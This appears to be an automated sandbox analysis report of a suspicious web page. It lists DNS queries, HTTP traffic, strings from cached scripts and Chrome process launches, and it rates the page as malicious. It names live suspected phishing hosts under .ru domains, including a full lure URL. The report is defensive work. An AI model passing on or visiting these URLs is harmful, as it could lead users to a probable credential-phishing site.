video&body=${encodeURIComponent(l)}`,icon:xW};default:return{id:"copy",url:l,icon:""}}}function IW(){return a=>{if(a.options.sources.length===0)return()=>{};a.addEventListener("loadsourcesrequest",s);async function s(){a.dispatchEvent(new jt.util.FakeEvent("playerloadmediastart"));const l=lg(a.options.sources);try{await a.load(l[0].src,a.options.startTime,l[0].type)}catch{a.dispatchShakaError(jt.util.Error.Severity.CRITICAL,jt.util.Error.Category.MEDIA,jt.util.Error.Code.MEDIA_SOURCE_OPERATION_FAILED);return}await a.loadCaptions(),a.dispatchEvent(new jt.util.FakeEvent("playerloadmediaend")),a.dispatchEvent(new jt.util.FakeEvent("loadsourcescomplete"))}return()=>{}}}function MW(){try{return crypto.randomUUID()}catch{return`10000000-1000-4000-8000-${1e11}`.replace(/[018]/g,a=>(a^crypto.getRandomValues(new Uint8Array(1))[0]&15>>a/4).toString(16))}}var _W=Object.defineProperty,PW=Object.getOwnPropertyDescriptor,cg=(a,s,l,p)=>{for(var d=p>1?void 0:p?PW(s,l):s,m=a.length-1,y;m>=0;m--)(y=a[m])&&(d=(p?y(s,l,d):y(d))||d);return p&&d&&_W(s,l,d),d};jt.polyfill.installAll();const i3="options";function a3(a,s,l){const p=a instanceof $a?a:$a.getById(a);return l&&p.addEventListener("ready",l,{once:!0}),p.setAttribute("options",JSON.stringify(s)),p}Object.defineProperty(a3,"allowAutoplay",{get:PL,set:QX});let $a=class extends Cn{constructor(){super(...arguments),this.umpId=`ump-${MW()}`,this.ariaLabel=null,this.playerStateContext=new Rw(this,{context:mr,initialValue:xM}),this.onVideoEvent=a=>{this.dispatchEvent(new kt(a.type,a.target))}}render(){return ht` equals www.facebook.com (Facebook)
Source: chromecache_268.2.dr, chromecache_278.2.drString found in binary or memory: </svg>`;function EW(a,s){return l=>{const p=AW(l).map(f=>CW(f));s.setValue({...s.value,shareOptions:p});function d(){s.setValue({...s.value,shareDialogOpened:!0})}function m(){var f,E,I,D,N,O;s.setValue({...s.value,shareDialogOpened:!1}),(O=(N=(D=(I=(E=(f=a.renderRoot)==null?void 0:f.querySelector("ump-controls"))==null?void 0:E.renderRoot.querySelector("ump-control-bar"))==null?void 0:I.renderRoot.querySelector("ump-more-menu"))==null?void 0:D.renderRoot.querySelector('[data-id="more-menu-button"]'))==null?void 0:N.focus)==null||O.call(N)}const y=Hh(a);return y.addEventListener("share-button-clicked",d),y.addEventListener("share-dialog-closed",m),()=>{y.removeAllListeners()}}}function AW(a){return a.options.share?a.options.shareOptions.length===0?wM:a.options.shareOptions:[]}function CW(a){const s=new URL(window.location.href);s.searchParams.delete("jsapi");const l=s.toString();switch(a){case"facebook":return{id:"facebook",url:`https://www.facebook.com/share.php?u=${encodeURIComponent(l)}`,icon:SW};case"linkedin":return{id:"linkedin",url:`https://www.linkedin.com/shareArticle?mini=true&url=${encodeURIComponent(l)}&title=&summary=&source=`,icon:TW};case"twitter":return{id:"twitter",url:`https://x.com/share?url=${encodeURIComponent(l)}&text=`,icon:kW};case"mail":return{id:"mail",url:`mailto:?subject=Check out this great video&body=${encodeURIComponent(l)}`,icon:xW};default:return{id:"copy",url:l,icon:""}}}function IW(){return a=>{if(a.options.sources.length===0)return()=>{};a.addEventListener("loadsourcesrequest",s);async function s(){a.dispatchEvent(new jt.util.FakeEvent("playerloadmediastart"));const l=lg(a.options.sources);try{await a.load(l[0].src,a.options.startTime,l[0].type)}catch{a.dispatchShakaError(jt.util.Error.Severity.CRITICAL,jt.util.Error.Category.MEDIA,jt.util.Error.Code.MEDIA_SOURCE_OPERATION_FAILED);return}await a.loadCaptions(),a.dispatchEvent(new jt.util.FakeEvent("playerloadmediaend")),a.dispatchEvent(new jt.util.FakeEvent("loadsourcescomplete"))}return()=>{}}}function MW(){try{return crypto.randomUUID()}catch{return`10000000-1000-4000-8000-${1e11}`.replace(/[018]/g,a=>(a^crypto.getRandomValues(new Uint8Array(1))[0]&15>>a/4).toString(16))}}var _W=Object.defineProperty,PW=Object.getOwnPropertyDescriptor,cg=(a,s,l,p)=>{for(var d=p>1?void 0:p?PW(s,l):s,m=a.length-1,y;m>=0;m--)(y=a[m])&&(d=(p?y(s,l,d):y(d))||d);return p&&d&&_W(s,l,d),d};jt.polyfill.installAll();const i3="options";function a3(a,s,l){const p=a instanceof $a?a:$a.getById(a);return l&&p.addEventListener("ready",l,{once:!0}),p.setAttribute("options",JSON.stringify(s)),p}Object.defineProperty(a3,"allowAutoplay",{get:PL,set:QX});let $a=class extends Cn{constructor(){super(...arguments),this.umpId=`ump-${MW()}`,this.ariaLabel=null,this.playerStateContext=new Rw(this,{context:mr,initialValue:xM}),this.onVideoEvent=a=>{this.dispatchEvent(new kt(a.type,a.target))}}render(){return ht` equals www.linkedin.com (Linkedin)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: gadk.quantumdhub.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru
Source: global trafficDNS traffic detected: DNS query: cdn.botframework.com
Source: global trafficDNS traffic detected: DNS query: play.vidyard.com
Source: global trafficDNS traffic detected: DNS query: publisher.liveperson.net
Source: global trafficDNS traffic detected: DNS query: lpcdn.lpsnmedia.net
Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
Source: global trafficDNS traffic detected: DNS query: lptag.liveperson.net
Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: accdn.lpsnmedia.net
Source: global trafficDNS traffic detected: DNS query: static-assets.fs.liveperson.com
Source: global trafficDNS traffic detected: DNS query: mscom.demdex.net
Source: global trafficDNS traffic detected: DNS query: msftenterprise.sc.omtrdc.net
Source: global trafficDNS traffic detected: DNS query: cm.everesttech.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3273sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aNsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 23:35:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Zs16ks2siptKF0TTTImZcm1g8hmLIveGGK5ITF%2FStCvWAItQyCIHNRek7Du8k5yIEIQ8yqHdqLRiNw7ijlbbW6s48H58bHYSbVtsLqb8dlqa%2FQgnM7j7qPyOl4tAA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1230&min_rtt=1208&rtt_var=360&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2265&delivery_rate=2283911&cwnd=251&unsent_bytes=0&cid=3f35405dad639a9f&ts=125&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8f53739fcfb27d0e-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1950&rtt_var=739&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1929&delivery_rate=1497435&cwnd=243&unsent_bytes=0&cid=57a8c6845244f4ca&ts=9959&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 23:36:00 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: +6hL0pT3TJ97Y8rcnxtD/lwrfIFhoydpd3U=$aJ/2MbpsaKhdA8vdcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f5373b8bbb878df-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 23:36:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 7F0/pDSQSbTkw548yn9HA/XnXL5Mj+Vgrs4=$EaMn5VI9x5h6mS2bcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f5373e3aeff2361-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 23:36:11 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: Q1HCreE2AIe3HaCa1s1vCmLo9GZoDuif7LA=$ZUtEN0WpFGGHPseDServer: cloudflareCF-RAY: 8f5373fe1b9642ad-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_319.2.dr, chromecache_275.2.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_272.2.dr, chromecache_187.2.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_257.2.dr, chromecache_302.2.drString found in binary or memory: http://scottjehl.github.io/picturefill
Source: chromecache_309.2.dr, chromecache_251.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_178.2.drString found in binary or memory: http://www.javascripter.net/faq/browsern.htm
Source: chromecache_178.2.drString found in binary or memory: http://www.javascriptkit.com/dhtmltutors/cssmediaqueries3.shtml
Source: chromecache_166.2.drString found in binary or memory: https://aka.ms/28808
Source: chromecache_272.2.dr, chromecache_187.2.drString found in binary or memory: https://aka.ms/PBI_Comm_Overview
Source: chromecache_187.2.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_172.2.dr, chromecache_199.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.js
Source: chromecache_197.2.dr, chromecache_308.2.drString found in binary or memory: https://axios-http.com
Source: chromecache_311.2.dr, chromecache_314.2.drString found in binary or memory: https://breeze.aimon.applicationinsights.io
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=12006
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=3334
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://bugzil.la/548397
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=277178
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=308064
Source: chromecache_329.2.dr, chromecache_249.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bluebird
Source: chromecache_166.2.drString found in binary or memory: https://checkout.office.com/acquire/purchase
Source: chromecache_166.2.drString found in binary or memory: https://checkout.office.com/acquire/purchase/
Source: chromecache_311.2.dr, chromecache_314.2.drString found in binary or memory: https://dc-int.services.visualstudio.com
Source: chromecache_311.2.dr, chromecache_314.2.drString found in binary or memory: https://dc.services.visualstudio.com
Source: chromecache_192.2.drString found in binary or memory: https://dev.azure.com/mscomdev/Moray/_workitems/edit/4494
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key/Key_Values
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://elad.medium.com/css-position-sticky-how-it-really-works-54cd01dc2d46
Source: chromecache_197.2.dr, chromecache_308.2.drString found in binary or memory: https://github.com/axios/axios.git
Source: chromecache_197.2.dr, chromecache_308.2.drString found in binary or memory: https://github.com/axios/axios/issues
Source: chromecache_283.2.dr, chromecache_168.2.drString found in binary or memory: https://github.com/carhartl/jquery-cookie
Source: chromecache_290.2.drString found in binary or memory: https://github.com/microsoft/BotFramework-WebChat/issues/2119
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://github.com/mozilla/rhino/issues/346
Source: chromecache_268.2.dr, chromecache_278.2.drString found in binary or memory: https://github.com/nevware21/ts-async
Source: chromecache_302.2.drString found in binary or memory: https://github.com/scottjehl/picturefill/blob/master/Authors.txt;
Source: chromecache_257.2.dr, chromecache_302.2.drString found in binary or memory: https://github.com/scottjehl/picturefill/tree/3.0/src/plugins/gecko-picture
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://github.com/tc39/proposal-error-cause
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://github.com/w3c/aria-practices/pull/1757
Source: chromecache_282.2.dr, chromecache_191.2.dr, chromecache_305.2.dr, chromecache_192.2.drString found in binary or memory: https://github.com/zloirock/core-js
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.25.0/LICENSE
Source: chromecache_282.2.dr, chromecache_305.2.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.30.1/LICENSE
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://github.com/zloirock/core-js/issues/86#issuecomment-115759028
Source: chromecache_180.2.dr, chromecache_240.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1MmB8?ver=6c43g
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://javascript.info/size-and-scroll-window#width-height-of-the-document
Source: chromecache_321.2.dr, chromecache_296.2.drString found in binary or memory: https://jquery.com/
Source: chromecache_321.2.dr, chromecache_296.2.drString found in binary or memory: https://jquery.org/license
Source: chromecache_321.2.dr, chromecache_296.2.drString found in binary or memory: https://js.foundation/
Source: chromecache_166.2.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.min.js
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://keycode.info/table-of-all-keycodes
Source: chromecache_224.2.dr, chromecache_330.2.drString found in binary or memory: https://login.live.com/Me.srf?wa
Source: chromecache_224.2.dr, chromecache_330.2.drString found in binary or memory: https://login.microsoftonline.com/forgetuser
Source: chromecache_224.2.dr, chromecache_330.2.drString found in binary or memory: https://login.microsoftonline.com/savedusers?appid
Source: chromecache_330.2.drString found in binary or memory: https://login.microsoftonline.com/uxlogout?appid
Source: chromecache_166.2.drString found in binary or memory: https://lpcdn.lpsnmedia.net/le_unified_window/10.13.0.5-release_5314/resources/icons/desktop/sprites
Source: chromecache_166.2.drString found in binary or memory: https://lpcdn.lpsnmedia.net/le_unified_window/9.12.0.19-release_4769/resources/loader_on_warmGray5_7
Source: chromecache_166.2.drString found in binary or memory: https://mcraa.fs.liveperson.com/messaging-agent-availability/api/account/60270350/getSkillAvailabili
Source: chromecache_197.2.dr, chromecache_308.2.drString found in binary or memory: https://microsoftit.pkgs.visualstudio.com/OneITVSO/_packaging/CSM-SITES-AEMFoundations/npm/registry/
Source: chromecache_162.2.dr, chromecache_260.2.drString found in binary or memory: https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net
Source: chromecache_162.2.dr, chromecache_260.2.drString found in binary or memory: https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net
Source: chromecache_180.2.dr, chromecache_240.2.drString found in binary or memory: https://outlook.live.com/owa/?nlp=1
Source: chromecache_272.2.dr, chromecache_187.2.drString found in binary or memory: https://play.vidyard.com/embed/v4.js
Source: chromecache_257.2.dr, chromecache_302.2.drString found in binary or memory: https://scottjehl.github.io/picturefill/
Source: chromecache_166.2.drString found in binary or memory: https://signup-local.azure.com/
Source: chromecache_166.2.drString found in binary or memory: https://signup-staging.azure.com/
Source: chromecache_166.2.drString found in binary or memory: https://signup.azure.com/
Source: chromecache_321.2.dr, chromecache_296.2.drString found in binary or memory: https://sizzlejs.com/
Source: chromecache_166.2.drString found in binary or memory: https://stores.office.com/
Source: chromecache_166.2.drString found in binary or memory: https://stores.office.com/subscription/acquire
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aec
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-array.prototype.includes
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-array.prototype.indexof
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-getmethod
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-hasownproperty
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-iscallable
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-lengthofarraylike
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-math.trunc
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.defineproperty
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.getownpropertydescriptor
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.getownpropertynames
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerable
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.setprototypeof
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-ordinarytoprimitive
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-requireobjectcoercible
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-tointegerorinfinity
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-tolength
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-toobject
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-toprimitive
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-topropertykey
Source: chromecache_191.2.dr, chromecache_192.2.drString found in binary or memory: https://tc39.es/proposal-error-cause/#sec-errorobjects-install-error-cause
Source: chromecache_166.2.drString found in binary or memory: https://va.idp.liveperson.net
Source: chromecache_166.2.drString found in binary or memory: https://va.msg.liveperson.net
Source: chromecache_166.2.drString found in binary or memory: https://www.microsoftstore.com.cn/
Source: chromecache_272.2.dr, chromecache_187.2.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_272.2.dr, chromecache_187.2.drString found in binary or memory: https://www.xbox.com/
Source: chromecache_272.2.dr, chromecache_187.2.drString found in binary or memory: https://www.xbox.com/en-us/games/store/pc-game-pass/cfq7ttc0kgq8?icid=CNavAllPCGamePass
Source: chromecache_272.2.dr, chromecache_187.2.drString found in binary or memory: https://www.xbox.com/en-us/games/store/xbox-game-pass-ultimate/cfq7ttc0khs0?icid=CNavAllXboxGamePass
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: classification engineClassification label: mal56.win@22/268@68/17
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1624 --field-trial-handle=2032,i,17181791565216499236,9261844077795664136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1624 --field-trial-handle=2032,i,17181791565216499236,9261844077795664136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
